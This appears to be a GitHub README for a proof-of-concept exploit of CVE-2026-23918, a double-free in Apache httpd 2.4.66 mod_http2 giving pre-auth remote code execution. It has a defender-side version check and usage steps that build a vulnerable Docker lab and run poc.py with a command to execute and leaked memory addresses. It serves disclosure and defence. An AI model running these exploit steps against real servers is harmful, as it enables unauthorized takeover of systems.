striga-ai/CVE-2026-23918

CVE-2026-23918

Double-free in Apache httpd mod_http2 stream cleanup leading to pre-auth RCE.

Affected: httpd 2.4.66 with mod_http2 and multi-threaded MPM (event/worker). Fixed in: 2.4.67.

Found and reported by Bartlomiej Dmitruk (striga.ai) and Stanislaw Strzalkowski (isec.pl).

Writeup: https://striga.ai/research/apache-httpd-mod-http2-double-free
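
A defender-side check for the affected conditions listed above (httpd 2.4.66, mod_http2 loaded, event or worker MPM), added here as an example that is not part of this repository. It parses the text of httpd -V and httpd -M; the function name, verdict strings and sample output are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from this repository): compare an httpd build against the
# affected conditions in this README: 2.4.66 + mod_http2 + event/worker MPM.

# classify_httpd "<output of httpd -V>" "<output of httpd -M>"
# Prints a single verdict line; the verdict strings are constructed for this example.
classify_httpd() {
    v_out=$1
    m_out=$2
    version=$(printf '%s\n' "$v_out" |
        sed -n 's|^Server version: *Apache/\([0-9.]*\).*|\1|p' | head -n 1)
    mpm=$(printf '%s\n' "$v_out" |
        sed -n 's|^Server MPM: *\([a-z]*\).*|\1|p' | head -n 1)

    if [ -z "$version" ]; then
        echo "unknown"            # could not parse the version banner
        return 0
    fi
    if [ "$version" != "2.4.66" ]; then
        echo "version-not-2.4.66 version=$version"
        return 0
    fi
    if ! printf '%s\n' "$m_out" | grep -q '^ *http2_module '; then
        echo "http2-not-loaded"
        return 0
    fi
    case "$mpm" in
        event|worker) echo "affected" ;;
        *)            echo "mpm-not-threaded mpm=$mpm" ;;
    esac
}

# Constructed sample output, shaped like `httpd -V` and `httpd -M`.
SAMPLE_V='Server version: Apache/2.4.66 (Unix)
Server MPM:     event
  threaded:     yes (fixed thread count)'
SAMPLE_M='Loaded Modules:
 core_module (static)
 mpm_event_module (shared)
 http2_module (shared)'

classify_httpd "$SAMPLE_V" "$SAMPLE_M"
# On a real host: classify_httpd "$(httpd -V 2>/dev/null)" "$(httpd -M 2>/dev/null)"
```

A verdict of affected means the build matches all three conditions; the fixed release named above is 2.4.67.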

Requirements

  • Docker
  • Python 3

Usage

Build and start the vulnerable environment:

docker build -t httpd-poc .
docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc

Get system() and scoreboard addresses:

docker exec httpd-poc python3 /getaddr.py 1

Run the exploit:

python3 poc.py --host localhost --port 9443 \
    --cmd 'date >> /tmp/win' --workers 64 \
    --system <system_addr> --scoreboard <scoreboard_addr>

Verify (execution is probabilistic, may take minutes to hours):

docker exec httpd-poc cat /tmp/win

Cleanup

docker rm -f httpd-poc
